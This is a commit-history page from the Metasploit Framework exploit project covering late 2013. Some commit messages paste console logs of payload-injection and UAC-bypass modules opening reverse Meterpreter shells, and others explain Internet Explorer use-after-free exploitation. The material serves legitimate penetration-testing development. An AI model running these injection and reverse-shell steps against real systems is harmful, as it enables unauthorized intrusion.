Commit Graph

11158 Commits (73e72a6488a9be9cccec13d00341f5a7cf543093)

Author SHA1 Message Date
Tod Beardsley 3c2dddd7aa
Update reference with a non-plagarised source 2013-10-16 14:44:18 -05:00
sinn3r 06a212207e Put PrependMigrate on hold because of #1674
But I will probably still want this.
2013-10-16 09:24:46 -05:00
sinn3r ac78f1cc5b Use Base64 encoding for OS parameter
I didn't even realize we already added this in server.rb. So instead
of just escaping the OS parameter, we also encode the data in base64.
I also added prependmigrate to avoid unstable conditions for the payload.
2013-10-15 23:37:11 -05:00
Tod Beardsley f57032636e
Straggler on a weird boilerplate format 2013-10-15 14:57:04 -05:00
Tod Beardsley 5d86ab4ab8
Catch mis-formatted bracket comments. 2013-10-15 14:52:12 -05:00
Tod Beardsley ed0b84b7f7
Another round of re-splatting. 2013-10-15 14:14:15 -05:00
Tod Beardsley c83262f4bd
Resplat another common boilerplate. 2013-10-15 14:07:48 -05:00
Tod Beardsley 23d058067a
Redo the boilerplate / splat
[SeeRM #8496]
2013-10-15 13:51:57 -05:00
jvazquez-r7 c68319d098 Fix author 2013-10-15 12:59:19 -05:00
jvazquez-r7 f60b29c7a6
Land #2503, @MrXors's local exploit using VSS 2013-10-15 12:35:26 -05:00
MrXors f345414832 Added correct spelling in info 2013-10-15 10:13:18 -07:00
jvazquez-r7 0b9cf24103 Convert vss_persistence to Local Exploit 2013-10-15 11:11:04 -05:00
jvazquez-r7 3b7be50d50 Fix typos 2013-10-15 10:03:00 -05:00
jvazquez-r7 18b4f80ca9 Add minor cleanup for vss_persistence 2013-10-15 09:56:18 -05:00
MrXors 6a1b1f35a8 Msftidy done. 2013-10-14 19:41:10 -07:00
MrXors d444ed054f Fixed RUNKEY, Fixed SCHTASKS, merged code 2013-10-14 19:36:44 -07:00
Tod Beardsley d0b1479d5b
Use the real timeout option for DCERPC 2013-10-14 17:41:51 -05:00
Tod Beardsley e8d0292118
Use read_response class method
Looks like this was never implemented in other modules, but it collects
data from the socket in the usual get_once sort of way.
2013-10-14 17:24:22 -05:00
Tod Beardsley 14be85ea5d
Land #2511, fix up NoMethodError and hanging connx 2013-10-14 16:30:19 -05:00
Meatballs a3af5d681b
Ensure TCP connection is closed 2013-10-14 21:53:22 +01:00
William Vu 31dc7c0c08 Land #2522, @todb-r7's pre-release module fixes 2013-10-14 15:37:23 -05:00
Tod Beardsley 63e40f9fba
Release time fixes to modules
* Period at the end of a description.
  * Methods shouldn't be meth_name! unless the method is destructive.
  * "Setup" is a noun, "set up" is a verb.
  * Use the clunky post module naming convention.
2013-10-14 15:17:39 -05:00
kaospunk 4b4804538f Fixes issues based on feedback
This commit addresses comments made by @jvazquez-r7.
2013-10-14 16:02:29 -04:00
sinn3r 15e8c3bcd6 [FixRM #8470] - can't convert nil into String
Target selection bug in ms13_069_caret.rb. Happens when the target
is Win 7 + IE8, which actually isn't a suitable target.

[FixRM #8470]
2013-10-14 14:10:08 -05:00
jvazquez-r7 75aaded842
Land #2471, @pyoor's exploit for CVE-2013-5743 2013-10-14 14:03:28 -05:00
jvazquez-r7 a6f17c3ba0 Clean zabbix_sqli 2013-10-14 14:01:58 -05:00
sinn3r e10dbf8a5d
Land #2508 - Add nodejs payloads 2013-10-14 12:23:31 -05:00
MrXors fc62b4c4ed removed global var from file_on_target and useless code 2013-10-14 09:16:54 -07:00
William Vu eab90e1a2e Land #2491, missing platform info update 2013-10-14 10:38:25 -05:00
MrXors 17e5c63f7f removed debugging prompts 2013-10-14 00:29:24 -07:00
MrXors b505234bf6 cleand up code and add run function 2013-10-14 00:12:37 -07:00
sinn3r 2a1ade2541 Add disclosure date and some explanation about it 2013-10-13 19:29:51 -05:00
jvazquez-r7 e2c5e6c19f Fix email format 2013-10-13 18:28:35 -05:00
jvazquez-r7 008f787627 Add module for the dlink user-agent backdoor 2013-10-13 14:42:45 -05:00
sinn3r 74f37c58b2
Land #2514 - Update CVE reference for Joomla 2013-10-13 12:58:23 -05:00
joev e2a9339592 Add CVE to joomla media upload module. 2013-10-12 21:20:11 -05:00
joev ea9235c506 Better whitespace. 2013-10-12 20:53:16 -05:00
joev 78b29b5f20 Bring osx persistence module to the finish line. 2013-10-12 20:50:53 -05:00
jvazquez-r7 3dbdc9f848
Land #2510, @wchen-r7's exploit for cve-2013-3897 2013-10-12 20:06:41 -05:00
sinn3r 9725918be8 Remove junk variables/params 2013-10-12 18:51:57 -05:00
sinn3r 2153dd26eb
Land #2501 - HP Data Protector Cell Request Service Buffer Overflow 2013-10-12 16:55:48 -05:00
joev 5a1b099570 Make osx persistence a local exploit. 2013-10-12 16:47:35 -05:00
sinn3r bc317760dc Make the GET params a little bit harder to read. 2013-10-12 16:37:49 -05:00
jvazquez-r7 172c6b9b8f Escape dots on regexs 2013-10-12 16:15:10 -05:00
joev 4fe407d7ee Move osx persistence to a local exploit. 2013-10-12 16:08:22 -05:00
Icewall f94b73a580 Adding persistence module for OSX 2013-10-12 16:06:19 -05:00
Meatballs 988ac68074
Dont define the NDR syntax 2013-10-12 19:56:52 +01:00
Meatballs 765b55182e
Randomize client variables
Also tidyup indents and use predefined UUID syntax.
2013-10-12 19:52:15 +01:00
sinn3r b139757021 Correct a typo in description 2013-10-12 13:24:36 -05:00
sinn3r 79c612cd67 Add MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Free
This module exploits a vulnerability found in Microsoft Internet Explorer.
It was originally found being exploited in the wild targeting Japanese and
Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893,
except this was kept out of the public eye by multiple research companies and
the vendor until the October patch release.

This issue is a use-after-free vulnerability in CDisplayPointer via the use of
a "onpropertychange" event handler. To setup the appropriate buggy conditions,
we first craft the DOM tree in a specific order, where a CBlockElement comes after
the CTextArea element. If we use a select() function for the CTextArea element,
two important things will happen: a CDisplayPointer object will be created for
CTextArea, and it will also trigger another event called "onselect". The "onselect"
event will allow us to setup for the actual event handler we want to abuse -
the "onpropertychange" event. Since the CBlockElement is a child of CTextArea,
if we do a node swap of CBlockElement in "onselect", this will trigger
"onpropertychange".  During "onpropertychange" event handling, a free of the
CDisplayPointer object can be forced by using an "Unslect" (other approaches
also apply), but a reference of this freed memory will still be kept by
CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call,
because it is still trying to use that to update CDisplayPointer's position.
When this invalid reference arrives in QIClassID, a crash finally occurs due to
accessing the freed memory. By controling this freed memory, it is possible to
achieve arbitrary code execution under the context of the user.
2013-10-12 13:01:17 -05:00
Meatballs cad717a186
Use NDR 32bit syntax.
Compatible with both x86 and x64 systems.
Tidy up the module...
2013-10-12 18:52:45 +01:00
Joe Barrett d929bdfaab Re-fixing 8419, consistency is important. 2013-10-12 08:09:19 -04:00
darknight007 7b82c64983 ms12-020 stack print resolve 2013-10-12 16:49:03 +05:00
darknight007 e1b9f1a3c4 modified ms12-020 module to resolve stack print 2013-10-12 16:36:37 +05:00
darknight007 291b90405d Merge branch 'master' of https://github.com/darknight007/metasploit-framework
Conflicts:
	modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
2013-10-12 16:23:09 +05:00
darknight007 602fd276bc using theirs 2013-10-12 16:20:26 +05:00
darknight007 4e50c574c5 Update ms12_020_maxchannelids.rb
ms12_020_maxchannelids.rb produces a call stack when the connection is timed out. 

To reproduct, just run the module against a system having no RDP enabled.
2013-10-12 15:39:13 +05:00
joev c7bcc97dff Add SSL support to #nodejs_reverse_tcp. 2013-10-12 03:32:52 -05:00
joev 6440a26f04 Move shared Node.js payload logic to mixin.
- this fixes the recursive loading issue when creating a payload
  inside the cmd payload
- also dries up some of the node cmd invocation logic.
2013-10-12 03:19:06 -05:00
Tod Beardsley 876d4e0aa8
Land #1420, WDS scanner 2013-10-11 16:53:25 -05:00
Tod Beardsley a1cf9619d9
Be clear this is 64-bit only in the desc. 2013-10-11 16:52:50 -05:00
MrXors 36af43a3cb Added Changes and cleaned up code 2013-10-11 14:17:50 -07:00
Tod Beardsley 181606e7cc
Single byte description update. Adds a period. 2013-10-11 15:04:25 -05:00
James Lee dfe74ce36c Factorize sock_sendpage 2013-10-11 13:40:01 -05:00
jvazquez-r7 11b6512a98
Lnad #2502, @bcoles's exploit for VMware Hyperic 2013-10-11 13:19:51 -05:00
jvazquez-r7 0b93996b05 Clean and add Automatic target 2013-10-11 13:19:10 -05:00
MrXors 66b82abb5d Cleaned up running exe func to not run when false is selected 2013-10-11 08:05:18 -07:00
MrXors 668d5cc3ae Added the option to choose to run .exe 2013-10-11 07:57:15 -07:00
jvazquez-r7 75c5e885f2 Land #2142, @morisson's exploit for CVE-2013-3319 2013-10-11 09:17:58 -05:00
jvazquez-r7 63349e4664 Add OSVDB and BID references 2013-10-11 09:14:59 -05:00
MrXors 3c8318e001 Changed Nothing Really 2013-10-11 07:10:56 -07:00
Bruno Morisson b26085457f Trying to prevent @jvazquez-r7 from crying when reading my code:
- Documented fields in the several tables;
- Fixed the "remote" field location on the fs_table (changed due to REXML parsing);
- Fixed Total Memory field on os_table  (bug?);
2013-10-11 11:29:27 +01:00
Tod Beardsley 49c629be5a
Land #2493, vbulletin exploit 2013-10-10 22:11:32 -05:00
Tod Beardsley cad7329f2d
Minor updates to vbulletin admin exploit 2013-10-10 22:09:38 -05:00
pyoor 171b70fa7c Zabbix v2.0.8 SQLi and RCE Module
Conflicts:
	modules/exploits/linux/http/zabbix_sqli.rb

Commit completed version of zabbix_sqli.rb
2013-10-10 22:50:02 -04:00
MrXors 2ee1b1c1c2 VSS Persistence on Windows 7 2013-10-10 17:20:09 -07:00
James Lee b9b2c82023 Add some entropy
* Random filename
* Stop shipping debug strings to the exploit executable

Also makes the writable path configurable, so we don't always have to
use /tmp in case it is mounted noexec, etc.
2013-10-10 18:18:01 -05:00
Meatballs 378f403fab
Land #2453, Add stdapi_net_resolve_host(s) to Python Meterpreter.
Moves resolve_host post module to multi and depreciates Windows module.
Resolve will now return nil for failed lookups instead of an empty
string.
2013-10-10 20:13:06 +01:00
Meatballs 9ca9b4ab29
Merge branch 'master' into data_dir
Conflicts:
	lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
bcoles 276ea22db3 Add VMware Hyperic HQ Groovy Script-Console Java Execution 2013-10-11 05:07:23 +10:30
jvazquez-r7 09f0db7fdf Switch to rexml parsing, add some comments and cleanup 2013-10-10 13:19:10 -05:00
Meatballs a843722ae3 Concurrent printing of the output no longer makes sense... 2013-10-10 19:01:19 +01:00
Meatballs 536c3c7b92 Use multi railgun call for a large performance increase. 2013-10-10 19:01:14 +01:00
William Vu 9b96351ba2 Land #2494, OSVDB ref for flashchat_upload_exec 2013-10-10 12:58:55 -05:00
jvazquez-r7 9516bc5cf7 Retab changes for PR #2142 2013-10-10 11:02:51 -05:00
jvazquez-r7 cdc7b75a78 Merge for retab 2013-10-10 11:02:16 -05:00
jvazquez-r7 f10078088c Add module for ZDI-13-130 2013-10-10 10:06:17 -05:00
Bruno Morisson c264480651 Code cleanup, tried to implement suggestions from @jvazquez-r7. Hopefully is much more readable. 2013-10-10 11:58:33 +01:00
trustedsec d208ab9260 Added multiple payload capabilities
Added support to specify multiple payload delivery options.

msf post(payload_inject) > show options

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   2                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    XXXXXXXX                         yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS  #<Msf::OptInt:0x007f5c6439c6d8>  no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION  1                                yes       The session to run this module on.

msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > exploit

[*] Running module against XXXXXXXX
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started reverse handler on XXXXXXXX:4433 
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (770048 bytes) to XXXXXXXX
[+] Successfully injected payload in to process: 884
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x00ba0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 884
[*] Post module execution completed
msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400

[*] Sending stage (770048 bytes) to XXXXXXXX

msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
2013-10-09 22:01:11 -04:00
James Lee 947925e3a3 Use a proper main signature with arguments
Allows us to `unlink(argv[0])`
2013-10-09 17:22:01 -05:00
trustedsec bec239abf1 Added ability to generate multiple payloads - not just one
Ran into a pentest recently where I had a flaky meterpreter shell, had it launch multiple ones just to be safe. The amount datastore allows you to iterate through and spawn multiple sessions.

msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject 
msf post(multi_meterpreter_inject) > show options

Module options (post/windows/manage/multi_meterpreter_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   1                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start new multi/handler job on local box.
   IPLIST   XXXXXXXXX                        yes       List of semicolom separated IP list.
   LPORT    4444                             no        Port number for the payload LPORT variable.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Payload to inject in to process memory
   PIDLIST                                   no        List of semicolom separated PID list.
   SESSION                                   yes       The session to run this module on.

msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit

[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400

[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
2013-10-09 18:11:09 -04:00
Spencer McIntyre be139beb20 Remove windows from title of multi module. 2013-10-09 17:11:47 -04:00
James Lee c251596f0b Fix some bugs in preparation for factorizing
* Stop removing \x0a characters with String#scan, which of course breaks
  the shellcode
* Fork so the original session continues to work
2013-10-09 16:03:40 -05:00
Spencer McIntyre 6c382c8eb7 Return nil on error, and move the module to post/multi. 2013-10-09 16:52:53 -04:00
jvazquez-r7 e3014a1e91 Fix ZDI Reference 2013-10-09 14:56:42 -05:00
jvazquez-r7 4fd599b7e0
Land #2483, @wchen-r7's patch for [SeeRM #8458] 2013-10-09 14:32:26 -05:00
jvazquez-r7 52574b09cb Add OSVDB reference 2013-10-09 14:13:45 -05:00
jvazquez-r7 4f3bbaffd1 Clean module and add reporting 2013-10-09 13:54:28 -05:00
sinn3r 1e3b84d39b Update ie_cgenericelement_uaf 2013-10-09 13:40:48 -05:00
jvazquez-r7 5c36533742 Add module for the vbulletin exploit in the wild 2013-10-09 13:12:57 -05:00
joev 1e78c3ca1a Add missing require to nodejs/bind payload. 2013-10-09 11:39:05 -05:00
Tod Beardsley c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS) 2013-10-09 09:56:07 -05:00
Winterspite 0acb170ee8 Bug #8419 - Added platform info missing on exploits 2013-10-08 22:41:50 -04:00
sinn3r ef48a4b385
Land #2486 - Fix error message backtrace 2013-10-08 14:55:39 -05:00
sinn3r 199bd20b95 Update CVE-2013-3893's Microsoft reference
Official patch is out:
http://technet.microsoft.com/en-us/security/bulletin/MS13-080
2013-10-08 13:00:03 -05:00
David Maloney 7d0cf73af7 Fix multi-meter_inject error msg
Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.

FIXRM #8460
2013-10-08 11:11:38 -05:00
Tod Beardsley 8b9ac746db
Land #2481, deprecate linksys cmd exec module 2013-10-07 20:44:04 -05:00
sinn3r c10f0253bc Land #2472 - Clean up the way Apple Safari UXSS aux module does data collection 2013-10-07 15:47:28 -05:00
sinn3r f7f6abc1dd Land #2479 - Add Joev to the wolfpack 2013-10-07 15:30:23 -05:00
sinn3r f4000d35ba Use RopDb for ms13_069
Target tested
2013-10-07 15:24:01 -05:00
sinn3r 7222e3ca49 Use RopDb for ms13_055_canchor.
All targets tested.
2013-10-07 15:09:36 -05:00
sinn3r 67228bace8 Use RopDb for ie_cgenericelement_uaf.
All targets tested except for Vista, so additional testing will need
to be done during review.
2013-10-07 14:51:34 -05:00
Rob Fuller aed2490536 add some output and fixing 2013-10-07 15:42:41 -04:00
Rob Fuller 75d2abc8c2 integrate some ask functionality into bypassuac 2013-10-07 15:14:54 -04:00
joev 4ba001d6dd Put my short name to prevent conflicts. 2013-10-07 14:10:47 -05:00
joev ec6516d87c Deprecate misnamed module.
* Renames to a linux linksys module.
2013-10-07 14:06:13 -05:00
sinn3r aea63130a4 Use RopDb for ie_cbutton_uaf.
All targets tested except for Vista. Will need additional testing
during review.
2013-10-07 14:03:07 -05:00
Tod Beardsley 219bef41a7
Decaps Siemens (consistent with other modules) 2013-10-07 13:12:32 -05:00
Tod Beardsley 4266b88a20
Move author name to just 'joev'
[See #2476]
2013-10-07 12:50:04 -05:00
sinn3r e016c9a62f Use RopDb msvcrt ROP chain. Tested all targets. 2013-10-07 12:27:43 -05:00
Tod Beardsley 293927aff0
msftidy fix for coldfusion exploit 2013-10-07 12:22:48 -05:00
joev da48565093 Add more payloads for nodejs.
* Adds a reverse and bind CMD payload
* Adds a bind payload (no bind_ssl for now).
2013-10-07 06:09:21 -05:00
joev 47e7a2de83 Kill stray debugger statement. 2013-10-06 19:32:22 -05:00
joev c2a81907ba Clean up the way Apple Safari UXSS aux module does data collection.
[FIXRM #7918]
2013-10-06 19:28:16 -05:00
trustedsec 0799766faa Fix UAC is not enabled, no reason to run module when UAC is enabled and vulnerable
The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is:

Here is prior to the change on a fully patched Windows 8 machine:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 172.16.21.156:4444 
[*] UAC is Enabled, checking level...
[-] UAC is not enabled, no reason to run module
[-] Run exploit/windows/local/ask to elevate
msf exploit(bypassuac) > 

Here's the module when running with the most recent changes that are being proposed:

[*] Started reverse handler on 172.16.21.156:4444 
[*] UAC is Enabled, checking level...
[!] Could not determine UAC level - attempting anyways...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (770048 bytes) to 172.16.21.128
[*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400

meterpreter > 

With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
2013-10-05 15:56:55 -04:00
jvazquez-r7 24efb55ba9 Clean flashchat_upload_exec 2013-10-05 14:50:51 -05:00
bcoles 08243b277a Add FlashChat Arbitrary File Upload exploit module 2013-10-05 22:30:38 +09:30
sinn3r a8de9d5c8b Land #2459 - Add HP LoadRunner magentproc.exe Overflow 2013-10-04 19:45:44 -05:00
Tod Beardsley f9eccae391
Land #2466, don't try to lockout SMB 2013-10-04 16:47:26 -05:00
James Lee 813013fef5 Make defaults sane for the lockoutable smb_login
See #2376
2013-10-04 15:53:16 -05:00
jvazquez-r7 113f89e40f First set of fixes for gestioip_exec 2013-10-04 13:29:27 -05:00
jvazquez-r7 299dfe73f1
Land #2460, @xistence's exploit for clipbucket 2013-10-04 12:26:30 -05:00
jvazquez-r7 8e0a4e08a2 Fix author order 2013-10-04 12:25:38 -05:00
Tod Beardsley ff72f0af62
Land #2461, GestioIP module 2013-10-04 11:07:08 -05:00
Tod Beardsley 9b79bb99e0 Add references, correct disclosure date 2013-10-04 09:59:26 -05:00
Tod Beardsley ab786d1466 Imply authentication when a password is set 2013-10-04 09:54:04 -05:00
Brandon Perry 0112d6253c add gestio ip module 2013-10-04 06:39:30 -07:00
jvazquez-r7 db11e88255
Land #2321, @juushya's aux module for Sentry CDU enumeration 2013-10-04 08:35:54 -05:00
xistence 81d4a8b8c1 added clipbucket_upload_exec RCE 2013-10-04 11:43:38 +07:00
jvazquez-r7 646429b4dd Put ready to pull request 2013-10-03 22:15:17 -05:00
jvazquez-r7 5971fe87f5 Improve reliability 2013-10-03 17:19:53 -05:00
jvazquez-r7 39eb20e33a Add module for ZDI-13-169 2013-10-03 16:52:20 -05:00
Karn Ganeshen 37e1e6533c changed default options
Updated these default options to false:
      'DB_ALL_CREDS'    => false
      'BLANK_PASSWORDS' => false
2013-10-04 02:48:42 +05:30
sinn3r 8059c59f15 Land #2452 - Ignore unexpected DNS answers 2013-10-03 15:54:22 -05:00
sinn3r c87e7b3cc1 Land #2451 - Don't overwrite default timeout on get_once 2013-10-03 15:44:40 -05:00
Tod Beardsley 539a22a49e
Typo on Microsoft 2013-10-03 12:20:47 -05:00
Tod Beardsley fcba424308
Kill off EOL spaces on astium_sqli_upload. 2013-10-03 11:01:27 -05:00
Karn Ganeshen 8aac3922f3 add radware_appdirector_enum
This module scans for Radware AppDirector's web login portal, and performs login brute force to identify valid credentials.

- mstidy.tb & retab.rb run done
- stop_on_success is set to true. Important, otherwise the app starts dropping bf source.
- slowing down brute force speed seems to work though, but can take a long time if more creds to check &| more targets
- better to run bf with 2-3 creds against range, & then come back with more creds if needed
2013-10-03 20:15:52 +05:30
jvazquez-r7 1fe0c50df0 Ignore unexpected answers 2013-10-02 20:41:02 -05:00
jvazquez-r7 0db93111de
Land #2445, @todb-r7's new tab warning for msftidy 2013-10-02 17:19:12 -05:00
Tabassassin 773abf0567
Pow, tab assassinated. 2013-10-02 17:16:38 -05:00
jvazquez-r7 77d0236b4e Don't overwrite defaul timeout 2013-10-02 16:15:14 -05:00
Meatballs c460f943f7
Merge branch 'master' into data_dir
Conflicts:
	modules/exploits/windows/local/always_install_elevated.rb
	plugins/sounds.rb
	scripts/meterpreter/powerdump.rb
	scripts/shell/spawn_meterpreter.rb
2013-10-02 20:17:11 +01:00
sinn3r 23b0c3b723 Add Metasploit blog references
These modules have blogs from the Rapid7 community, we should add them.
2013-10-01 20:50:16 -05:00
sinn3r 932ed0a939 Land #2444 - Add SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Vuln 2013-10-01 20:35:17 -05:00
jvazquez-r7 ed82be6fd8 Use RopDB 2013-10-01 13:23:09 -05:00
jvazquez-r7 6483c5526a Add module for OSVDB 93696 2013-10-01 11:42:36 -05:00
sinn3r 9abf727fa6 Land #2439 - Update description 2013-09-30 16:03:15 -05:00
sinn3r 7118f7dc4c Land #2422 - rm methods peer & rport
Because they're already defined in the HttpClient mixin
2013-09-30 16:01:59 -05:00
Brandon Turner 3cfee5a7c0
Land #2440, remaining tabassassin changes 2013-09-30 14:30:50 -05:00
jvazquez-r7 6c8f86883d
Land #2437, @wchen-r7's exploit for CVE-2013-3893 2013-09-30 14:02:29 -05:00
Tab Assassin 2e8d19edcf Retab all the things (except external/) 2013-09-30 13:47:53 -05:00
Tod Beardsley 4dc88cf60f Expand descriptions for ease of use. 2013-09-30 13:30:31 -05:00
sinn3r c82ed33a95 Forgot Math.cos() 2013-09-30 13:29:16 -05:00
sinn3r d6cd0e5c67 Tweak for office 2007 setup 2013-09-30 13:27:59 -05:00
sinn3r ecf4e923e8 Change the target address for spray 1 2013-09-30 11:57:59 -05:00
Tod Beardsley 9ada96ac51
Fix sqlmap accidental codepoint
See http://www.ruby-doc.org/core-1.9.3/String.html#method-i-3C-3C

Apparently, String#<< uses Integer#chr, not Integer#to_s. News to me.

Fixed originally by @TsCl in PR #2435, but fixing seperately in order to
avoid screwing up his downstream tracking. Note, this isn't a merge, so
using Closes tag on the commit message.

[Closes #2435]
2013-09-30 11:23:17 -05:00
darknight007 f1ab7b51b1 Update ms12_020_maxchannelids.rb
ms12_020_maxchannelids.rb produces a call stack when the connection is timed out. 

To reproduct, just run the module against a system having no RDP enabled.
2013-09-30 13:43:26 +05:00
sinn3r b9aae1c93c Higher address seems better 2013-09-29 18:45:30 -05:00
sinn3r a5ade93ab2 Add CVE-2013-3893 Internet Explorer SetMouseCapture Use-After-Free
This module exploits a use-after-free vulnerability that currents
targets Internet Explorer 9 on Windows 7, but the flaw should exist in
versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but
other regions such as English, Chinese, Korean, etc, were targeted as
well.

The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function
handles a reference during an event. An attacker first can setup two
elements, where the second is the child of the first, and then setup a
onlosecapture event handler for the parent element. The onlosecapture
event seems to require two setCapture() calls to trigger, one for the parent
element, one for the child. When the setCapture() call for the child element
is called, it finally triggers the event, which allows the attacker to cause
an arbitrary memory release using document.write(), which in particular frees
up a 0x54-byte memory. The exact size of this memory may differ based on the
version of IE. After the free, an invalid reference will still be kept and pass
on to more functions, eventuall this arrives in function
MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution)
when this function attempts to use this reference to call what appears to be a
PrivateQueryInterface due to the offset (0x00).

To mimic the same exploit found in the wild, this module will try to use the
same DLL from Microsoft Office 2007 or 2010 to leverage the attack.
2013-09-29 18:24:13 -05:00
Meatballs b306415ecf
Tidy and updates to info 2013-09-29 17:32:39 +01:00
Meatballs 29a7059eb4
Update AlwaysInstallElevated to use a generated MSI file
Fixes bugs with MSI::UAC option, invalid logic and typo...
2013-09-29 17:09:03 +01:00
Tod Beardsley 7cc2ad55a6
Land #1770, unattend.xml snarfing modules 2013-09-27 16:04:38 -05:00
Tod Beardsley 63d638888d Get rid of interior tabs 2013-09-27 16:04:03 -05:00
Tod Beardsley d869b1bb70 Unless, unless everywhere. 2013-09-27 15:55:57 -05:00
Tod Beardsley ae655e42d2 Touchups: boolean check, unless, and TODO comment 2013-09-27 15:54:03 -05:00
Tod Beardsley 37e4d58f4a Call CSV text/plain so it can be viewed normally
Otherwise, things parsing through the loot table will treat it as binary
data, and not display it in a normal texty way, even though it's totally
readable with just a little squinting.
2013-09-27 15:48:48 -05:00
Tod Beardsley 5e77dccd48 Add a ref to an example unattend.xml 2013-09-27 15:45:57 -05:00
Meatballs 8b800cf5de Merge and resolve conflicts 2013-09-27 18:19:23 +01:00
jvazquez-r7 58600b6475
Land #2423, @TecR0c's exploit for OSVDB 96517 2013-09-27 09:48:52 -05:00
jvazquez-r7 6381bbfd39 Clean up freeftpd_pass 2013-09-27 09:47:39 -05:00
TecR0c b02a2b9ce0 Added crash info and basic tidy up 2013-09-27 17:05:42 +10:00
TecR0c 7dbc3f4f87 changed seh address to work on freeFTPd 1.0.10 and below 2013-09-27 12:37:52 +10:00
TecR0c 5fc98481a7 changed seh address to work on freeFTPd 1.0.10 and below 2013-09-27 12:35:03 +10:00
